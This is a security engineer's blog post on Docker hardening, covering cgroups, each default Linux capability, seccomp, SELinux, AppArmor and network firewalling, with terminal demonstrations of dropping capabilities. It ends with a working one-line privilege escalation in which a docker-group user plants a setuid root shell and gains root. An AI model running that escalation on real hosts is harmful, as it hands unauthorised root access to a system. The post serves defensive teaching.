Where the open source community meets: Secure your spot for Percona Live Amsterdam! - Register

Downloads

Blog

Docker Security Considerations Part I

July 11, 2019

Author

John Lionis

Cloud

Security

Share this Post:

Docker Security Considerations – PART I

Why Docker Security Matters

It is a fact that Docker has found widespread use during the past years, mostly because it is very easy to use as well as fast and easy to deploy when compared with a full-blown virtual machine. More and more servers are being operated as Docker hosts on which micro-services run in containers. From a security point of view, two aspects of it arise in the context of this blog post and the inherent limitations it has as a means of communication.

First, the answer to the already quite talked-through question, “Is it secure?” Second, the less analyzed aspect of incident analysis, and the changes introduced with respect to known methods and evidence. In order to answer the first question, some key facts about Docker need to be noted. The second aspect, being less examined in general, will be a future post in this mini-series about Docker security.

The basic technology that enables containers in Linux is kernel name-spaces. These are what allow the kernel to offer private resources to a process, while hiding the resources of other processes, all without actually creating full guest OSes or kernels per process. One very important fact is that containers run without cgroup limitations by default, but CPU and memory usage can be easily constrained with the application of a few flags. Docker presents an option called cgroup-parent for this purpose, and you can check the official docker documentation on cgroup-parent. Under no circumstances should containers (or any process) be allowed to run on a production server without such cgroup limitations. In addition, predefined resource consumption for containers could help in limiting the costs for cloud infrastructure as it better defines them, leading to more targeted purchases.

Docker uses a default profile to create a system call whitelist. In this profile, “dangerous” syscalls are missing. If you have a solid understanding of exactly the system calls needed by your containerized process, you can customize this profile or write your own to lock out every syscall not needed by your container. Also, note that custom profiles can be applied on a container-by-container basis. In addition, Linux capabilities can be a very good way with regards to considerations on Docker security. Quoting from the man-pages:

For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process’s credentials (usually: effective UID, effective GID, and supplementary group list).

Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled. Capabilities are a per-thread attribute.

In the example below, we can see the basic syntax for manipulating and auditing capabilities. Perhaps the most secure way to run Docker is using the –user flag (no capabilities), but this is not always possible since there is no way to add capabilities to a nonzero UID. In cases where this is needed, running as root with –cap-drop ALL and –cap-add to add back the minimum set of capabilities is the most secure practical configuration. Note that since a Docker container is fundamentally just a process, it’s simple to enforce these permissions at runtime using the native Linux functionality designed to manage capabilities per process. No ‘under-the-hood’ configuration inside the container is required, but it would be to manipulate the capabilities of groups of processes running in a VM.

A closer look at these should highlight the need to manage them and will give us a better understanding of what’s going on. The default list of capabilities available to privileged processes in a docker container (mostly quoting https://www.redhat.com/en/blog/secure-your-containers-one-weird-trick) is presented below. A complete list of capabilities can be found at the following link http://man7.org/linux/man-pages/man7/capabilities.7.html. At this point we should note that in Dockerfile v3 and above, capabilities can be added and images built; e.g.

cap_drop:

- ALL

cap_add:

- chown

cap_drop:

- ALL

cap_add:

- chown

The default list of capabilities available in a Docker container:

chown:

This is described as the ability to make arbitrary changes to file UIDs and GIDs. Unless a shell is running inside a container and packages installed into it, this should be dropped. If chown is needed, allow it, do the work, and then drop it again.

dac_override:

(Discretionary access control)_override.

Man pages state that this cap allows root to bypass file r, w & x permissions. It is as odd as it sounds, that any app will need this. As noted by RedHat sec experts “nothing should need this. If your container needs this, it probably doing something horrible.”

fowner:

fowner transfers the ability to bypass permission checks on operations that normally require the file system UID to match the UID of the file. Quite similar to dac_overide. Could be needed for docker build but it should be dropped when the container is in production.

fsetid:

Quoting the man page “don’t clear set-user-ID and set-group-ID mode bits when a file is modified; set the set-group-ID bit for a file whose GID does not match the file system or any of the supplementary GIDs of the calling process.”

So, if you are not running an installation, you probably do not need this capability.

kill

This capability basically means that a root-owned process can send kill signals to non-root processes. If your container is running all processes as root or the root processes never kills processes running as non-root, you do not need this capability. If you are running systemd as PID 1 inside of a container, and you want to stop a container running with a different UID, you might need this capability.

setgid

In short, a process with this capability can change its GID to any other GID. Basically allows full group access to all files on the system. If your container processes do not change UIDs/GIDs, they do not need this capability.

setuid

A process with this capability can change its UID to any other UID. Basically, it allows full access to all files on the system. If your container processes do not change UIDs/GIDs always running as the same UID, preferably non-root, they do not need this capability. Applications that need setuid usually start as root in order to bind to ports below 1024 and then change their UIDS and drop capabilities. Apache binding to port 80 requires net_bind_service, usually starting as root. It then needs setuid/setgid to switch to the apache user and drop capabilities. Most containers can safely drop setuid/setgid capability.

setpcap

From the man page description: “Add any capability from the calling thread’s bounding set to its inheritable set; drop capabilities from the bounding set (via prctl(2) PR_CAPBSET_DROP); make changes to the securebits flags.”

A process with this capability can change its current capability set within its bounding set. Meaning a process could drop capabilities or add capabilities if it did not currently have them, but is limited by the bounding set capabilities.

net_bind_service

If you have this capability, you can bind to privileged ports (< 1024).

When binding to a port below 1024 is needed, this capability will do the job. For services that listen to a port above 1024, this capability should be dropped. The risk of this capability is a rogue process interpreting a service like sshd, and collecting user passwords. Running a container in a different network namespace reduces the risk of this capability. It would be difficult for the container process to get to the public network interface

net_raw

This access allows a process to spy on packets on its network. Most container processes would not need this access so it probably should be dropped. Note this would only affect the containers that share the same network that your container process is running on, usually preventing access to the real network. RAW sockets also give an attacker the ability to inject almost anything onto the network.

sys_chroot

This capability allows the use of chroot(). In other words, it allows your processes to chroot into a different rootfs. chroot is probably not used within your container, so it should be dropped.

mknod

If you have this capability, you can create special files using mknod.

This allows your processes to create device nodes. Containers are usually provided all of the device nodes they need in /dev, so this could and should be dropped by default. Almost no containers ever do this, and even fewer containers should do this.

audit_write

With this capability, you can write a message to the kernel auditing log. Few processes attempt to write to the audit log (login programs, su, sudo) and processes inside of the container are probably not trusted. The audit subsystem is not currently namespace-aware, so this should be dropped by default.

setfcap

Finally, the setfcap capability allows you to set file capabilities on a file system. Might be needed for doing installs during builds, but in production, it should probably be dropped.

The following exercise, the output of which is displayed below, should highlight the way of manipulating capabilities along with some of the points made above.

First, we run a container that changes ownership of the root fs:

Status: Image is up to date for centos:latest
john@seceng:~/Documents/docker-sec$
john@seceng:~/Documents/docker-sec$ docker container run --rm centos:latest chown nobody /
john@seceng:~/Documents/docker-sec$

Status: Image is up to date for centos:latest

john@seceng:~/Documents/docker-sec$

john@seceng:~/Documents/docker-sec$ docker container run --rm centos:latest chown nobody /

john@seceng:~/Documents/docker-sec$

We can see that the root user is able to execute this without a problem.

Next, we drop all capabilities from the user in the container, and when we try running the above command again, we can see it fails, as the user no longer has the necessary chown capability (or any other root capabilities):

john@seceng:~/Documents/docker-sec$ docker container run --rm --cap-drop all centos:latest chown nobody /
chown: changing ownership of '/': Operation not permitted
john@seceng:~/Documents/docker-sec$

john@seceng:~/Documents/docker-sec$ docker container run --rm --cap-drop all centos:latest chown nobody /

chown: changing ownership of '/': Operation not permitted

john@seceng:~/Documents/docker-sec$

Now we add the necessary capability back in:

john@seceng:~/Documents/docker-sec$ docker container run --rm --cap-drop all --cap-add chown centos:latest chown nobody /
john@seceng:~/Documents/docker-sec$

1 2	john@seceng:~/Documents/docker-sec$ docker container run --rm --cap-drop all --cap-add chown centos:latest chown nobody / john@seceng:~/Documents/docker-sec$

Dropping all capabilities and adding back only the required ones makes for the most secure containers. An attacker who breaches this container won’t have any root capabilities except chown.

Now, if we try adding chown to a non-root user, the operation fails since capabilities manipulation won’t grant additional capabilities under any circumstances to a process run by a non-root user, as noted on the following screenshot.

john@seceng:~/Documents/docker-sec$ docker container run --rm --user 1000:1000 --cap-add chown centos:latest chown nobody /
chown: changing ownership of '/': Operation not permitted
john@seceng:~/Documents/docker-sec$

john@seceng:~/Documents/docker-sec$ docker container run --rm --user 1000:1000 --cap-add chown centos:latest chown nobody /

chown: changing ownership of '/': Operation not permitted

john@seceng:~/Documents/docker-sec$

Another Linux feature that can aid the process of securing our containers is Secure computing mode (seccomp). Seccomp is a Linux kernel feature. You can use it to restrict the actions available within the container. The seccomp() system call operates on the seccomp state of the calling process. You can use this feature to restrict your application’s access.

This feature is available only if Docker has been built with seccomp and the kernel is configured with CONFIG_SECCOMP enabled. More info about the seccomp profiles for Docker can be found here. To check if your kernel supports seccomp:

john@seceng:~/Documents/docker-sec$ grep CONFIG_SECCOMP= /boot/config-$(uname -r)
CONFIG_SECCOMP=y
john@seceng:~/Documents/docker-sec$

john@seceng:~/Documents/docker-sec$ grep CONFIG_SECCOMP= /boot/config-$(uname -r)

CONFIG_SECCOMP=y

john@seceng:~/Documents/docker-sec$

While capabilities and seccomp allow restricting access to root capabilities and system calls, SELinux goes a step further and helps protect the file system of the host from malicious code. Default SELinux labels restrict access to directories and those labels can be changed by the :z and :Z flags when mounting directories to relabel those directories for sharing or private use by containers, respectively.

Additionally, AppArmor (Application Armor) is a Linux security module that protects an operating system and its applications from security threats. To use it, a system administrator associates an AppArmor security profile with each program. Docker expects to find an AppArmor policy loaded and enforced. Docker automatically generates and loads a default profile for containers named docker-default. On Docker versions 1.13.0 and later, the Docker binary generates this profile in tmpfs and then loads it into the kernel. On Docker versions earlier than 1.13.0, this profile is generated in /etc/apparmor.d/docker instead. It should be noted, though, that this profile is used on containers, not on the Docker daemon. More on AppArmor and Docker can be found at docker’s official documentation.

Last in this list of facts, but certainly not in general, is the default software-defined network firewalling imposed by Docker, and the iptables rules automatically managed by Docker. The Docker Networking Model was designed around software-defined networks exactly so that Docker could easily manage iptables firewall rules on create and destroy operations of Docker networks and containers. Rather than writing complicated iptables rules explicitly, effective firewalling can be imposed on a containerized data center simply by designing and declaring a sensible software-defined network topology.

Basically, but for sure not limited to, Docker Security considerations rise because the Docker daemon runs as root and is being used widely in production systems. Having said that and taking into account the previously mentioned facts, one can easily understand that configuration, bugs, vulnerabilities or other security issues are of high risk and impact factor. With this in mind, the following example, which highlights the non-secure default configuration of Docker, is probably the best “teaser” for the next part of this post, in which we will cover some recent vulnerabilities and their mitigation.

john@seceng:~/Documents/docker-sec$ id

uid=1000(john) gid=1000(john) groups=1000(john),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)
john@seceng:~/Documents/docker-sec$ whoami

john
john@seceng:~/Documents/docker-sec$ docker run -v /home/${user}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p

rootshell-4.4# id
uid=1000(john) gid=1000(john) euid=0(root) groups=1000(john),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)
rootshell-4.4# whoami

root
rootshell-4.4# uname -a

Linux seceng 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5 (2019-06-19) x86_64 GNU/Linux
rootshell-4.4# exit

exit
john@seceng:~/Documents/docker-sec$

john@seceng:~/Documents/docker-sec$ id

uid=1000(john) gid=1000(john) groups=1000(john),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)

john@seceng:~/Documents/docker-sec$ whoami

john

john@seceng:~/Documents/docker-sec$ docker run -v /home/${user}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p

rootshell-4.4# id

uid=1000(john) gid=1000(john) euid=0(root) groups=1000(john),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)

rootshell-4.4# whoami

root

rootshell-4.4# uname -a

Linux seceng 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5 (2019-06-19) x86_64 GNU/Linux

rootshell-4.4# exit

exit

john@seceng:~/Documents/docker-sec$

From user to root, in one line. It’s there by default.

John Lionis, Security Engineer | Percona LLC